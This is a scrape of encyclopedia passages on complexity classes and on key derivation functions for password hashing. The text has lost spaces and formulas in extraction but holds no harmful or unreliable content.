system in which the verifier is restricted to being a deterministic polynomial-timeTuring machineand the procedure is restricted to one round (that is, the prover sends only a single, full proof—typically referred to as thecertificate—to the verifier). Put another way, in the definition of the classNP(the set of decision problems for which the problem instances, when the answer is "YES", have proofs verifiable in polynomial time by a deterministic Turing machine) is a proof system in which the proof is constructed by an unmentioned prover and the deterministic Turing machine is the verifier. For this reason,NPcan also be calleddIP(deterministic interactive proof), though it is rarely referred to as such. It turns out thatNPcaptures the full power of interactive proof systems with deterministic (polynomial-time) verifiers because it can be shown that for any proof system with a deterministic verifier it is never necessary to need more than a single round of messaging between the prover and the verifier. Interactive proof systems that provide greater computational power over standard complexity classes thus requireprobabilisticverifiers, which means that the verifier's questions to the prover are computed usingprobabilistic algorithms. As noted in the section above onrandomized computation, probabilistic algorithms introduce error into the system, so complexity classes based on probabilistic proof systems are defined in terms of an error probabilityϵ{\displaystyle \epsilon }. The most general complexity class arising out of this characterization is the classIP(interactive polynomial time), which is the class of all problems solvable by an interactive proof system(P,V){\displaystyle (P,V)}, whereV{\displaystyle V}is probabilistic polynomial-time and the proof system satisfies two properties: for a languageL∈IP{\displaystyle L\in {\mathsf {IP}}} An important feature ofIPis that it equalsPSPACE. In other words, any problem that can be solved by a polynomial-time interactive proof system can also be solved by adeterministic Turing machinewith polynomial space resources, and vice versa. A modification of the protocol forIPproduces another important complexity class:AM(Arthur–Merlin protocol). In the definition of interactive proof systems used byIP, the prover was not able to see the coins utilized by the verifier in its probabilistic computation—it was only able to see the messages that the verifier produced with these coins. For this reason, the coins are calledprivate random coins. The interactive proof system can be constrained so that the coins used by the verifier arepublic random coins; that is, the prover is able to see the coins. Formally,AMis defined as the class of languages with an interactive proof in which the verifier sends a random string to the prover, the prover responds with a message, and the verifier either accepts or rejects by applying a deterministic polynomial-time function to the message from the prover.AMcan be generalized toAM[k], wherekis the number of messages exchanged (so in the generalized form the standardAMdefined above isAM[2]). However, it is the case that for allk≥2{\displaystyle k\geq 2},AM[k]=AM[2]. It is also the case thatAM[k]⊆IP[k]{\displaystyle {\mathsf {AM}}[k]\subseteq {\mathsf {IP}}[k]}. Other complexity classes defined using interactive proof systems includeMIP(multiprover interactive polynomial time) andQIP(quantum interactive polynomial time). An alternative model of computation to theTuring machineis theBoolean circuit, a simplified model of thedigital circuitsused in moderncomputers. Not only does this model provide an intuitive connection between computation in theory and computation in practice, but it is also a natural model fornon-uniform computation(computation in which different input sizes within the same problem use different algorithms). Formally, a Boolean circuitC{\displaystyle C}is adirected acyclic graphin which edges represent wires (which carry thebitvalues 0 and 1), the input bits are represented by source vertices (vertices with no incoming edges), and all non-source vertices representlogic gates(generally theAND,OR, andNOT gates). One logic gate is designated the output gate, and represents the end of the computation. The input/output behavior of a circuitC{\displaystyle C}withn{\displaystyle n}input variables is represented by theBoolean functionfC:{0,1}n→{0,1}{\displaystyle f_{C}:\{0,1\}^{n}\to \{0,1\}}; for example, on input bitsx1,x2,...,xn{\displaystyle x_{1},x_{2},...,x_{n}}, the output bitb{\displaystyle b}of the circuit is represented mathematically asb=fC(x1,x2,...,xn){\displaystyle b=f_{C}(x_{1},x_{2},...,x_{n})}. The circuitC{\displaystyle C}is said tocomputethe Boolean functionfC{\displaystyle f_{C}}. Any particular circuit has a fixed number of input vertices, so it can only act on inputs of that size.Languages(the formal representations ofdecision problems), however, contain strings of differing lengths, so languages cannot be fully captured by a single circuit (this contrasts with the Turing machine model, in which a language is fully described by a single Turing machine that can act on any input size). A language is thus represented by acircuit family. A circuit family is an infinite list of circuits(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}, whereCn{\displaystyle C_{n}}is a circuit withn{\displaystyle n}input variables. A circuit family is said to decide a languageL{\displaystyle L}if, for every stringw{\displaystyle w},w{\displaystyle w}is in the languageL{\displaystyle L}if and only ifCn(w)=1{\displaystyle C_{n}(w)=1}, wheren{\displaystyle n}is the length ofw{\displaystyle w}. In other words, a stringw{\displaystyle w}of sizen{\displaystyle n}is in the language represented by the circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}if the circuitCn{\displaystyle C_{n}}(the circuit with the same number of input vertices as the number of bits inw{\displaystyle w}) evaluates to 1 whenw{\displaystyle w}is its input. While complexity classes defined using Turing machines are described in terms oftime complexity, circuit complexity classes are defined in terms of circuit size — the number of vertices in the circuit. The size complexity of a circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}is the functionf:N→N{\displaystyle f:\mathbb {N} \to \mathbb {N} }, wheref(n){\displaystyle f(n)}is the circuit size ofCn{\displaystyle C_{n}}. The familiar function classes follow naturally from this; for example, a polynomial-size circuit family is one such that the functionf{\displaystyle f}is apolynomial. The complexity classP/polyis the set of languages that are decidable by polynomial-size circuit families. It turns out that there is a natural connection between circuit complexity and time complexity. Intuitively, a language with small time complexity (that is, requires relatively few sequential operations on a Turing machine), also has a small circuit complexity (that is, requires relatively few Boolean operations). Formally, it can be shown that if a language is inDTIME(t(n)){\displaystyle {\mathsf {DTIME}}(t(n))}, wheret{\displaystyle t}is a functiont:N→N{\displaystyle t:\mathbb {N} \to \mathbb {N} }, then it has circuit complexityO(t2(n)){\displaystyle O(t^{2}(n))}.[16]It follows directly from this fact thatP⊂P/poly{\displaystyle {\mathsf {\color {Blue}P}}\subset {\textsf {P/poly}}}. In other words, any problem that can be solved in polynomial time by a deterministic Turing machine can also be solved by a polynomial-size circuit family. It is further the case that the inclusion is proper, i.e.P⊊P/poly{\displaystyle {\textsf {P}}\subsetneq {\textsf {P/poly}}}(for example, there are someundecidable problemsthat are inP/poly). P/polyhas a number of properties that make it highly useful in the study of the relationships between complexity classes. In particular, it is helpful in investigating problems related toPversusNP. For example, if there is any language inNPthat is not inP/poly, thenP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[17]P/polyis also helpful in investigating properties of thepolynomial hierarchy. For example, ifNP⊆P/poly, thenPHcollapses toΣ2P{\displaystyle \Sigma _{2}^{\mathsf {P}}}. A full description of the relations betweenP/polyand other complexity classes is available at "Importance of P/poly".P/polyis also helpful in the general study of the properties ofTuring machines, as the class can be equivalently defined as the class of languages recognized by a polynomial-time Turing machine with a polynomial-boundedadvice function. Two subclasses ofP/polythat have interesting properties in their own right areNCandAC. These classes are defined not only in terms of their circuit size but also in terms of theirdepth. The depth of a circuit is the length of the longestdirected pathfrom an input node to the output node. The classNCis the set of languages that can be solved by circuit families that are restricted not only to having polynomial-size but also to having polylogarithmic depth. The classACis defined similarly toNC, however gates are allowed to have unbounded fan-in (that is, the AND and OR gates can be applied to more than two bits).NCis a notable class because it can be equivalently defined as the class of languages that have efficientparallel algorithms. The classesBQPandQMA, which are of key importance inquantum information science, are defined usingquantum Turing machines. While most complexity classes studied by computer scientists are sets ofdecision problems, there are also a number of complexity classes defined in terms of other types of problems. In particular, there are complexity classes consisting ofcounting problems,function problems, andpromise problems. These are explained in greater detail below. Acounting problemasks not onlywhethera solution exists (as with adecision problem), but askshow manysolutions exist.[18]For example, the decision problemCYCLE{\displaystyle {\texttt {CYCLE}}}askswhethera particular graphG{\displaystyle G}has asimple cycle(the answer is a simple yes/no); the corresponding counting problem#CYCLE{\displaystyle \#{\texttt {CYCLE}}}(pronounced "sharp cycle") askshow manysimple cyclesG{\displaystyle G}has.[19]The output to a counting problem is thus a number, in contrast to the output for a decision problem, which is a simple yes/no (or accept/reject, 0/1, or other equivalent scheme).[20] Thus, whereas decision problems are represented mathematically asformal languages, counting problems are represented mathematically asfunctions: a counting problem is formalized as the functionf:{0,1}∗→N{\displaystyle f:\{0,1\}^{*}\to \mathbb {N} }such that for every inputw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}},f(w){\displaystyle f(w)}is the number of solutions. For example, in the#CYCLE{\displaystyle \#{\texttt {CYCLE}}}problem, the input is a graphG∈{0,1}∗{\displaystyle G\in \{0,1\}^{*}}(a graph represented as a string ofbits) andf(G){\displaystyle f(G)}is the number of simple cycles inG{\displaystyle G}. Counting problems arise in a number of fields, includingstatistical estimation,statistical physics,network design, andeconomics.[21] #P(pronounced "sharp P") is an important class of counting problems that can be thought of as the counting version ofNP.[22]The connection toNParises from the fact that the number of solutions to a problem equals the number of accepting branches in anondeterministic Turing machine's computation tree.#Pis thus formally defined as follows: And just asNPcan be defined both in terms of nondeterminism and in terms of a verifier (i.e. as aninteractive proof system), so too can#Pbe equivalently defined in terms of a verifier. Recall that a decision problem is inNPif there exists a polynomial-time checkablecertificateto a given problem instance—that is,NPasks whether there exists a proof of membership (a certificate) for the input that can be checked for correctness in polynomial time. The class#Paskshow manysuch certificates exist.[22]In this context,#Pis defined as follows: Counting problems are a subset of a broader class of problems calledfunction problems. A function problem is a type of problem in which the values of afunctionf:A→B{\displaystyle f:A\to B}are computed. Formally, a function problemf{\displaystyle f}is defined as a relationR{\displaystyle R}over strings of an arbitraryalphabetΣ{\displaystyle \Sigma }: An algorithm solvesf{\displaystyle f}if for every inputx{\displaystyle x}such that there exists ay{\displaystyle y}satisfying(x,y)∈R{\displaystyle (x,y)\in R}, the algorithm produces one suchy{\displaystyle y}. This is just another way of saying thatf{\displaystyle f}is afunctionand the algorithm solvesf(x){\displaystyle f(x)}for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}}. An important function complexity class isFP, the class of efficiently solvable functions.[23]More specifically,FPis the set of function problems that can be solved by adeterministic Turing machineinpolynomial time.[23]FPcan be thought of as the function problem equivalent ofP. Importantly,FPprovides some insight into both counting problems andPversusNP. If#P=FP, then the functions that determine the number of certificates for problems inNPare efficiently solvable. And since computing the number of certificates is at least as hard as determining whether a certificate exists, it must follow that if#P=FPthenP=NP(it is not known whether this holds in the reverse, i.e. whetherP=NPimplies#P=FP).[23] Just asFPis the function problem equivalent ofP,FNPis the function problem equivalent ofNP. Importantly,FP=FNPif and only ifP=NP.[24] Promise problemsare a generalization of decision problems in which the input to a problem is guaranteed ("promised") to be from a particular subset of all possible inputs. Recall that with a decision problemL⊆{0,1}∗{\displaystyle L\subseteq \{0,1\}^{*}}, an algorithmM{\displaystyle M}forL{\displaystyle L}must act (correctly) oneveryw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}}. A promise problem loosens the input requirement onM{\displaystyle M}by restricting the input to some subset of{0,1}∗{\displaystyle \{0,1\}^{*}}. Specifically, a promise problem is defined as a pair of non-intersecting sets(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}, where:[25] The input to an algorithmM{\displaystyle M}for a promise problem(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}is thusΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}, which is called thepromise. Strings inΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}are said tosatisfy the promise.[25]By definition,ΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}must be disjoint, i.e.ΠACCEPT∩ΠREJECT=∅{\displaystyle \Pi _{\text{ACCEPT}}\cap \Pi _{\text{REJECT}}=\emptyset }. Within this formulation, it can be seen that decision problems are just the subset of promise problems with the trivial promiseΠACCEPT∪ΠREJECT={0,1}∗{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}=\{0,1\}^{*}}. With decision problems it is thus simpler to simply define the problem as onlyΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}(withΠREJECT{\displaystyle \Pi _{\text{REJECT}}}implicitly being{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}), which throughout this page is denotedL{\displaystyle L}to emphasize thatΠACCEPT=L{\displaystyle \Pi _{\text{ACCEPT}}=L}is aformal language. Promise problems make for a more natural formulation of many computational problems. For instance, a computational problem could be something like "given aplanar graph, determine whether or not..."[26]This is often stated as a decision problem, where it is assumed that there is some translation schema that takeseverystrings∈{0,1}∗{\displaystyle s\in \{0,1\}^{*}}to a planar graph. However, it is more straightforward to define this as a promise problem in which the input is promised to be a planar graph. Promise problems provide an alternate definition for standard complexity classes of decision problems.P, for instance, can be defined as a promise problem:[27] Classes of decision problems—that is, classes of problems defined as formal languages—thus translate naturally to promise problems, where a languageL{\displaystyle L}in the class is simplyL=ΠACCEPT{\displaystyle L=\Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}is implicitly{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}. Formulating many basic complexity classes likePas promise problems provides little additional insight into their nature. However, there are some complexity classes for which formulating them as promise problems have been useful to computer scientists. Promise problems have, for instance, played a key role in the study ofSZK(statistical zero-knowledge).[28] The following table shows some of the classes of problems that are considered in complexity theory. If classXis a strictsubsetofY, thenXis shown belowYwith a dark line connecting them. IfXis a subset, but it is unknown whether they are equal sets, then the line is lighter and dotted. Technically, the breakdown into decidable and undecidable pertains more to the study ofcomputability theory, but is useful for putting the complexity classes in perspective.
https://en.wikipedia.org/wiki/Complexity_class
Incryptography, akey derivation function(KDF) is a cryptographic algorithm that derives one or moresecret keysfrom a secret value such as a master key, apassword, or apassphraseusing apseudorandom function(which typically uses acryptographic hash functionorblock cipher).[1][2][3]KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of aDiffie–Hellman key exchangeinto a symmetric key for use withAES.Keyed cryptographic hash functionsare popular examples of pseudorandom functions used for key derivation.[4] The first[citation needed]deliberately slow (key stretching) password-based key derivation function was called "crypt" (or "crypt(3)" after itsman page), and was invented byRobert Morrisin 1978. It would encrypt a constant (zero), using the first 8 characters of the user's password as the key, by performing 25 iterations of a modifiedDESencryption algorithm (in which a 12-bit number read from the real-time computer clock is used to perturb the calculations). The resulting 64-bit number is encoded as 11 printable characters and then stored in theUnixpassword file.[5]While it was a great advance at the time, increases in processor speeds since thePDP-11era have made brute-force attacks against crypt feasible, and advances in storage have rendered the 12-bit salt inadequate. The crypt function's design also limits the user password to 8 characters, which limits the keyspace and makes strongpassphrasesimpossible.[citation needed] Although high throughput is a desirable property in general-purpose hash functions, the opposite is true in password security applications in which defending against brute-force cracking is a primary concern. The growing use of massively-parallel hardware such as GPUs, FPGAs, and even ASICs for brute-force cracking has made the selection of a suitable algorithms even more critical because the good algorithm should not only enforce a certain amount of computational cost not only on CPUs, but also resist the cost/performance advantages of modern massively-parallel platforms for such tasks. Various algorithms have been designed specifically for this purpose, includingbcrypt,scryptand, more recently,Lyra2andArgon2(the latter being the winner of thePassword Hashing Competition). The large-scaleAshley Madison data breachin which roughly 36 million passwords hashes were stolen by attackers illustrated the importance of algorithm selection in securing passwords. Although bcrypt was employed to protect the hashes (making large scale brute-force cracking expensive and time-consuming), a significant portion of the accounts in the compromised data also contained a password hash based on the fast general-purposeMD5algorithm, which made it possible for over 11 million of the passwords to be cracked in a matter of weeks.[6] In June 2017, The U.S. National Institute of Standards and Technology (NIST) issued a new revision of their digital authentication guidelines, NIST SP 800-63B-3,[7]: 5.1.1.2stating that: "Verifiers SHALL store memorized secrets [i.e. passwords] in a form that is resistant to offline attacks. Memorized secrets SHALL be salted and hashed using a suitable one-way key derivation function. Key derivation functions take a password, a salt, and a cost factor as inputs then generate a password hash. Their purpose is to make each password guessing trial by an attacker who has obtained a password hash file expensive and therefore the cost of a guessing attack high or prohibitive." Modern password-based key derivation functions, such asPBKDF2,[2]are based on a recognized cryptographic hash, such asSHA-2, use more salt (at least 64 bits and chosen randomly) and a high iteration count. NIST recommends a minimum iteration count of 10,000.[7]: 5.1.1.2"For especially critical keys, or for very powerful systems or systems where user-perceived performance is not critical, an iteration count of 10,000,000 may be appropriate.”[8]: 5.2 The original use for a KDF is key derivation, the generation of keys from secret passwords or passphrases. Variations on this theme include: Key derivation functions are also used in applications to derive keys from secret passwords or passphrases, which typically do not have the desired properties to be used directly as cryptographic keys. In such applications, it is generally recommended that the key derivation function be made deliberately slow so as to frustratebrute-force attackordictionary attackon the password or passphrase input value. Such use may be expressed asDK = KDF(key, salt, iterations), whereDKis the derived key,KDFis the key derivationfunction,keyis the original key or password,saltis a random number which acts ascryptographic salt, anditerationsrefers to the number ofiterationsof a sub-function. The derived key is used instead of the original key or password as the key to the system. The values of the salt and the number of iterations (if it is not fixed) are stored with the hashed password or sent ascleartext(unencrypted) with an encrypted message.[10] The difficulty of a brute force attack is increased with the number of iterations. A practical limit on the iteration count is the unwillingness of users to tolerate a perceptible delay in logging into a computer or seeing a decrypted message. The use ofsaltprevents the attackers from precomputing a dictionary of derived keys.[10] An alternative approach, calledkey strengthening, extends the key with a random salt, but then (unlike in key stretching) securely deletes the salt.[11]This forces both the attacker and legitimate users to perform a brute-force search for the salt value.[12]Although the paper that introduced key stretching[13]referred to this earlier technique and intentionally chose a different name, the term "key strengthening" is now often (arguably incorrectly) used to refer to key stretching. Despite their original use for key derivation, KDFs are possibly better known for their use inpassword hashing(password verification by hash comparison), as used by thepasswdfile orshadow passwordfile. Password hash functions should be relatively expensive to calculate in case of brute-force attacks, and thekey stretchingof KDFs happen to provide this characteristic.[citation needed]The non-secret parameters are called "salt" in this context. In 2013 aPassword Hashing Competitionwas announced to choose a new, standard algorithm for password hashing. On 20 July 2015 the competition ended andArgon2was announced as the final winner. Four other algorithms received special recognition: Catena,Lyra2, Makwa andyescrypt.[14] As of May 2023, theOpen Worldwide Application Security Project(OWASP) recommends the following KDFs for password hashing, listed in order of priority:[15]
https://en.wikipedia.org/wiki/Key_derivation_function
Incomputational complexity theory, acomplexity classis asetofcomputational problems"of related resource-basedcomplexity".[1]The two most commonly analyzed resources aretimeandmemory. In general, a complexity class is defined in terms of a type of computational problem, amodel of computation, and a bounded resource liketimeormemory. In particular, most complexity classes consist ofdecision problemsthat are solvable with aTuring machine, and are differentiated by their time or space (memory) requirements. For instance, the classPis the set of decision problems solvable by a deterministic Turing machine inpolynomial time. There are, however, many complexity classes defined in terms of other types of problems (e.g.counting problemsandfunction problems) and using other models of computation (e.g.probabilistic Turing machines,interactive proof systems,Boolean circuits, andquantum computers). The study of the relationships between complexity classes is a major area of research intheoretical computer science. There are often general hierarchies of complexity classes; for example, it is known that a number of fundamental time and space complexity classes relate to each other in the following way:L⊆NL⊆P⊆NP⊆PSPACE⊆EXPTIME⊆NEXPTIME⊆EXPSPACE(where ⊆ denotes thesubsetrelation). However, many relationships are not yet known; for example, one of the most famousopen problemsin computer science concerns whetherPequalsNP. The relationships between classes often answer questions about the fundamental nature of computation. ThePversusNPproblem, for instance, is directly related to questions of whethernondeterminismadds any computational power to computers and whether problems having solutions that can be quickly checked for correctness can also be quickly solved. Complexity classes aresetsof relatedcomputational problems. They are defined in terms of the computational difficulty of solving the problems contained within them with respect to particular computational resources like time or memory. More formally, the definition of a complexity class consists of three things: a type of computational problem, a model of computation, and a bounded computational resource. In particular, most complexity classes consist ofdecision problemsthat can be solved by aTuring machinewith boundedtimeorspaceresources. For example, the complexity classPis defined as the set ofdecision problemsthat can be solved by adeterministic Turing machineinpolynomial time. Intuitively, acomputational problemis just a question that can be solved by analgorithm. For example, "is thenatural numbern{\displaystyle n}prime?" is a computational problem. A computational problem is mathematically represented as thesetof answers to the problem. In the primality example, the problem (call itPRIME{\displaystyle {\texttt {PRIME}}}) is represented by the set of all natural numbers that are prime:PRIME={n∈N|nis prime}{\displaystyle {\texttt {PRIME}}=\{n\in \mathbb {N} |n{\text{ is prime}}\}}. In the theory of computation, these answers are represented asstrings; for example, in the primality example the natural numbers could be represented as strings ofbitsthat representbinary numbers. For this reason, computational problems are often synonymously referred to as languages, since strings of bits representformal languages(a concept borrowed fromlinguistics); for example, saying that thePRIME{\displaystyle {\texttt {PRIME}}}problem is in the complexity classPis equivalent to saying that the languagePRIME{\displaystyle {\texttt {PRIME}}}is inP. The most commonly analyzed problems in theoretical computer science aredecision problems—the kinds of problems that can be posed asyes–no questions. The primality example above, for instance, is an example of a decision problem as it can be represented by the yes–no question "is thenatural numbern{\displaystyle n}prime". In terms of the theory of computation, a decision problem is represented as the set of input strings that a computer running a correctalgorithmwould answer "yes" to. In the primality example,PRIME{\displaystyle {\texttt {PRIME}}}is the set of strings representing natural numbers that, when input into a computer running an algorithm that correctlytests for primality, the algorithm answers "yes, this number is prime". This "yes-no" format is often equivalently stated as "accept-reject"; that is, an algorithm "accepts" an input string if the answer to the decision problem is "yes" and "rejects" if the answer is "no". While some problems cannot easily be expressed as decision problems, they nonetheless encompass a broad range of computational problems.[2]Other types of problems that certain complexity classes are defined in terms of include: To make concrete the notion of a "computer", in theoretical computer science problems are analyzed in the context of acomputational model. Computational models make exact the notions of computational resources like "time" and "memory". Incomputational complexity theory, complexity classes deal with theinherentresource requirements of problems and not the resource requirements that depend upon how a physical computer is constructed. For example, in the real world different computers may require different amounts of time and memory to solve the same problem because of the way that they have been engineered. By providing an abstract mathematical representations of computers, computational models abstract away superfluous complexities of the real world (like differences inprocessorspeed) that obstruct an understanding of fundamental principles. The most commonly used computational model is theTuring machine. While other models exist and many complexity classes are defined in terms of them (see section"Other models of computation"), the Turing machine is used to define most basic complexity classes. With the Turing machine, instead of using standard units of time like the second (which make it impossible to disentangle running time from the speed of physical hardware) and standard units of memory likebytes, the notion of time is abstracted as the number of elementary steps that a Turing machine takes to solve a problem and the notion of memory is abstracted as the number of cells that are used on the machine's tape. These are explained in greater detail below. It is also possible to use theBlum axiomsto define complexity classes without referring to a concretecomputational model, but this approach is less frequently used in complexity theory. ATuring machineis a mathematical model of a general computing machine. It is the most commonly used model in complexity theory, owing in large part to the fact that it is believed to be as powerful as any other model of computation and is easy to analyze mathematically. Importantly, it is believed that if there exists an algorithm that solves a particular problem then there also exists a Turing machine that solves that same problem (this is known as theChurch–Turing thesis); this means that it is believed thateveryalgorithm can be represented as a Turing machine. Mechanically, a Turing machine (TM) manipulates symbols (generally restricted to the bits 0 and 1 to provide an intuitive connection to real-life computers) contained on an infinitely long strip of tape. The TM can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6". The Turing machine starts with only the input string on its tape and blanks everywhere else. The TM accepts the input if it enters a designated accept state and rejects the input if it enters a reject state. The deterministic Turing machine (DTM) is the most basic type of Turing machine. It uses a fixed set of rules to determine its future actions (which is why it is called "deterministic"). A computational problem can then be defined in terms of a Turing machine as the set of input strings that a particular Turing machine accepts. For example, the primality problemPRIME{\displaystyle {\texttt {PRIME}}}from above is the set of strings (representing natural numbers) that a Turing machine running an algorithm that correctlytests for primalityaccepts. A Turing machine is said torecognizea language (recall that "problem" and "language" are largely synonymous in computability and complexity theory) if it accepts all inputs that are in the language and is said todecidea language if it additionally rejects all inputs that are not in the language (certain inputs may cause a Turing machine to run forever, sodecidabilityplaces the additional constraint overrecognizabilitythat the Turing machine must halt on all inputs). A Turing machine that "solves" a problem is generally meant to mean one that decides the language. Turing machines enable intuitive notions of "time" and "space". Thetime complexityof a TM on a particular input is the number of elementary steps that the Turing machine takes to reach either an accept or reject state. Thespace complexityis the number of cells on its tape that it uses to reach either an accept or reject state. The deterministic Turing machine (DTM) is a variant of the nondeterministic Turing machine (NTM). Intuitively, an NTM is just a regular Turing machine that has the added capability of being able to explore multiple possible future actions from a given state, and "choosing" a branch that accepts (if any accept). That is, while a DTM must follow only one branch of computation, an NTM can be imagined as a computation tree, branching into many possible computational pathways at each step (see image). If at least one branch of the tree halts with an "accept" condition, then the NTM accepts the input. In this way, an NTM can be thought of as simultaneously exploring all computational possibilities in parallel and selecting an accepting branch.[3]NTMs are not meant to be physically realizable models, they are simply theoretically interesting abstract machines that give rise to a number of interesting complexity classes (which often do have physically realizable equivalent definitions). Thetime complexityof an NTM is the maximum number of steps that the NTM uses onanybranch of its computation.[4]Similarly, thespace complexityof an NTM is the maximum number of cells that the NTM uses on any branch of its computation. DTMs can be viewed as a special case of NTMs that do not make use of the power of nondeterminism. Hence, every computation that can be carried out by a DTM can also be carried out by an equivalent NTM. It is also possible to simulate any NTM using a DTM (the DTM will simply compute every possible computational branch one-by-one). Hence, the two are equivalent in terms of computability. However, simulating an NTM with a DTM often requires greater time and/or memory resources; as will be seen, how significant this slowdown is for certain classes of computational problems is an important question in computational complexity theory. Complexity classes group computational problems by their resource requirements. To do this, computational problems are differentiated byupper boundson the maximum amount of resources that the most efficient algorithm takes to solve them. More specifically, complexity classes are concerned with therate of growthin the resources required to solve particular computational problems as the input size increases. For example, the amount of time it takes to solve problems in the complexity classPgrows at apolynomialrate as the input size increases, which is comparatively slow compared to problems in the exponential complexity classEXPTIME(or more accurately, for problems inEXPTIMEthat are outside ofP, sinceP⊆EXPTIME{\displaystyle {\mathsf {P}}\subseteq {\mathsf {EXPTIME}}}). Note that the study of complexity classes is intended primarily to understand theinherentcomplexity required to solve computational problems. Complexity theorists are thus generally concerned with finding the smallest complexity class that a problem falls into and are therefore concerned with identifying which class a computational problem falls into using themost efficientalgorithm. There may be an algorithm, for instance, that solves a particular problem in exponential time, but if the most efficient algorithm for solving this problem runs in polynomial time then the inherent time complexity of that problem is better described as polynomial. Thetime complexityof an algorithm with respect to the Turing machine model is the number of steps it takes for a Turing machine to run an algorithm on a given input size. Formally, the time complexity for an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functiontM:N→N{\displaystyle t_{M}:\mathbb {N} \to \mathbb {N} }, wheretM(n){\displaystyle t_{M}(n)}is the maximum number of steps thatM{\displaystyle M}takes on any input of lengthn{\displaystyle n}. In computational complexity theory, theoretical computer scientists are concerned less with particular runtime values and more with the general class of functions that the time complexity function falls into. For instance, is the time complexity function apolynomial? Alogarithmic function? Anexponential function? Or another kind of function? Thespace complexityof an algorithm with respect to the Turing machine model is the number of cells on the Turing machine's tape that are required to run an algorithm on a given input size. Formally, the space complexity of an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functionsM:N→N{\displaystyle s_{M}:\mathbb {N} \to \mathbb {N} }, wheresM(n){\displaystyle s_{M}(n)}is the maximum number of cells thatM{\displaystyle M}uses on any input of lengthn{\displaystyle n}. Complexity classes are often defined using granular sets of complexity classes calledDTIMEandNTIME(for time complexity) andDSPACEandNSPACE(for space complexity). Usingbig O notation, they are defined as follows: Pis the class of problems that are solvable by adeterministic Turing machineinpolynomial timeandNPis the class of problems that are solvable by anondeterministic Turing machinein polynomial time. Or more formally, Pis often said to be the class of problems that can be solved "quickly" or "efficiently" by a deterministic computer, since thetime complexityof solving a problem inPincreases relatively slowly with the input size. An important characteristic of the classNPis that it can be equivalently defined as the class of problems whose solutions areverifiableby a deterministic Turing machine in polynomial time. That is, a language is inNPif there exists adeterministicpolynomial time Turing machine, referred to as the verifier, that takes as input a stringw{\displaystyle w}anda polynomial-sizecertificatestringc{\displaystyle c}, and acceptsw{\displaystyle w}ifw{\displaystyle w}is in the language and rejectsw{\displaystyle w}ifw{\displaystyle w}is not in the language. Intuitively, the certificate acts as aproofthat the inputw{\displaystyle w}is in the language. Formally:[5] This equivalence between the nondeterministic definition and the verifier definition highlights a fundamental connection betweennondeterminismand solution verifiability. Furthermore, it also provides a useful method for proving that a language is inNP—simply identify a suitable certificate and show that it can be verified in polynomial time. While there might seem to be an obvious difference between the class of problems that are efficiently solvable and the class of problems whose solutions are merely efficiently checkable,PandNPare actually at the center of one of the most famous unsolved problems in computer science: thePversusNPproblem. While it is known thatP⊆NP{\displaystyle {\mathsf {P}}\subseteq {\mathsf {NP}}}(intuitively, deterministic Turing machines are just a subclass of nondeterministic Turing machines that don't make use of their nondeterminism; or under the verifier definition,Pis the class of problems whose polynomial time verifiers need only receive the empty string as their certificate), it is not known whetherNPis strictly larger thanP. IfP=NP, then it follows that nondeterminism providesno additional computational powerover determinism with regards to the ability to quickly find a solution to a problem; that is, being able to exploreall possible branchesof computation providesat mosta polynomial speedup over being able to explore only a single branch. Furthermore, it would follow that if there exists a proof for a problem instance and that proof can be quickly be checked for correctness (that is, if the problem is inNP), then there also exists an algorithm that can quicklyconstructthat proof (that is, the problem is inP).[6]However, the overwhelming majority of computer scientists believe thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}},[7]and mostcryptographic schemesemployed today rely on the assumption thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[8] EXPTIME(sometimes shortened toEXP) is the class of decision problems solvable by a deterministic Turing machine in exponential time andNEXPTIME(sometimes shortened toNEXP) is the class of decision problems solvable by a nondeterministic Turing machine in exponential time. Or more formally, EXPTIMEis a strict superset ofPandNEXPTIMEis a strict superset ofNP. It is further the case thatEXPTIME⊆{\displaystyle \subseteq }NEXPTIME. It is not known whether this is proper, but ifP=NPthenEXPTIMEmust equalNEXPTIME. While it is possible to definelogarithmictime complexity classes, these are extremely narrow classes as sublinear times do not even enable a Turing machine to read the entire input (becauselog⁡n<n{\displaystyle \log n<n}).[a][9]However, there are a meaningful number of problems that can be solved in logarithmic space. The definitions of these classes require atwo-tape Turing machineso that it is possible for the machine to store the entire input (it can be shown that in terms ofcomputabilitythe two-tape Turing machine is equivalent to the single-tape Turing machine).[10]In the two-tape Turing machine model, one tape is the input tape, which is read-only. The other is the work tape, which allows both reading and writing and is the tape on which the Turing machine performs computations. The space complexity of the Turing machine is measured as the number of cells that are used on the work tape. L(sometimes lengthened toLOGSPACE) is then defined as the class of problems solvable in logarithmic space on a deterministic Turing machine andNL(sometimes lengthened toNLOGSPACE) is the class of problems solvable in logarithmic space on a nondeterministic Turing machine. Or more formally,[10] It is known 